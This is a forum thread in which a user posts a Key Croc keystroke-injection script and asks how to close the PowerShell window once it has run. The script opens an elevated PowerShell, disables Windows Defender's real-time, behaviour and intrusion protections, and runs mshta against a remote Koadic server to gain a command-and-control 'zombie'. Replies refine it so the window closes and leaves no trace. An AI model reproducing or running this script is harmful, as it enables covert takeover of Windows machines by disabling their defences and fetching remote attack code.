fneagle Posted November 29, 2020

Hi,

I'm trying to get a simple script running with the Key Croc. I had many problems in the beginning with Wifi, language and special keys, but have made some progress.

First of all: It is very difficult to get a simple script running with the Croc. You always have to switch between arming and attack mode. Sometimes it is working, sometimes not. I can't even see a reason why it is so unstable. My feedback at the moment: It is not worth using. Keylogger okay, but for the rest I'll use different tools.

I don't want to give up and would like to finish my project with the Croc.

Here is my script:

    MATCH easy
    QUACK DELAY 1000
    # Disable Defender
    ATTACKMODE HID
    QUACK GUI-r
    QUACK DELAY 1000
    export DUCKY_LANG=de
    QUACK DELAY 1000
    QUACK STRING "powershell Start-Process powershell -Verb runAS"
    QUACK ENTER
    sleep 3
    QUACK ALT j
    QUACK STRING "Set-MpPreference -DisableRealtimeMonitoring \$true -SubmitSamplesConsent NeverSend -DisableIOAVProtection \$true -DisableIntrusionPreventionSystem \$true -DisableBlockAtFirstSeen \$true -DisableBehaviorMonitoring \$true -MAPSReporting 0"
    QUACK ENTER
    sleep 1
    QUACK STRING "Set-ItemProperty 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware 1"
    QUACK ENTER
    #Start Attack with Koadic and get a Zombi
    QUACK STRING "mshta http://192.168.171.32:443/index"
    QUACK ENTER

Here is my question:

The script is running fine. The Windows Defender is disabled and I can run "mshta http://" to get a "Zombie" on my Koadic Server. The problem is that after running the last command, I have no focus on the PowerShell window. This means that I'm not able to add STRING exit to close the window. If I use the mouse and click on the window, I can add a string again.

Any suggestions?

Mohamed A. Baset Posted November 29, 2020

Modify the last injected payload from:

    QUACK STRING "mshta http://192.168.171.32:443/index"

to

    QUACK STRING "mshta http://192.168.171.32:443/index;exit"

fneagle Posted November 30, 2020

Thanks! I'll try it. Meanwhile, I did it this way:

    QUACK GUI-r
    QUACK STRING "tskill powershell"

Archived
This topic is now archived and is closed to further replies.